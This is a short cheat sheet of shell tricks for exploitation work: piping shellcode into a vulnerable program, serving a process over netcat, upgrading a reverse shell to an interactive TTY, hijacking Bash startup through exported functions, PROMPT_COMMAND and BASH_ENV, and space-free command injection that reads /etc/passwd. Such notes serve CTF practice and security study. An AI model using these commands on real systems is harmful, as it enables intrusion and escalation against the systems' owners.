Various notes on helpful command line and shell-isms.
Helpful when working with an exploitable program that reads from stdin.
# https://security.stackexchange.com/a/120501
cat shellcode.hex - | ./vulnerable_program
# https://stackoverflow.com/a/36327396
#!/bin/bash
coproc myapp
nc -kl -p 4000 <&"${COPROC[0]}" >&"${COPROC[1]}"
# https://stackoverflow.com/a/17030976
printf "%0.sA" {1..10}
# Note these commands are executed in the reverse shell.
script /dev/null
# Note: There are probably alternatives to python.
python -c 'import pty;pty.spawn("/bin/bash");'
# Press Ctrl+Z.
stty raw -echo
fg
# Press enter a few times.
# Now you can execute 'bash -i' or other things.
# Setting the 'XTERM=xterm' env. can be helpful for 'top' and other things too.
# Note: "export" does not like this syntax; you need to find another way to
# set the environment variable through a parent process.
# The following example overrides "echo" to call "/bin/echo" with a prefix:
BASH_FUNC_echo%%='() { /bin/echo "w00t $@"; }'
export PROMPT_COMMAND="echo foo"
# This example executes "/path/to/my/script.sh" when a new Bash shell starts.
export BASH_ENV=/path/to/my/script.sh
bash
"Command injection without spaces", fyoorer
# Bash:
{echo,foo.bar}
# Other shells:
args=$'\x20/etc/passwd'
cat$args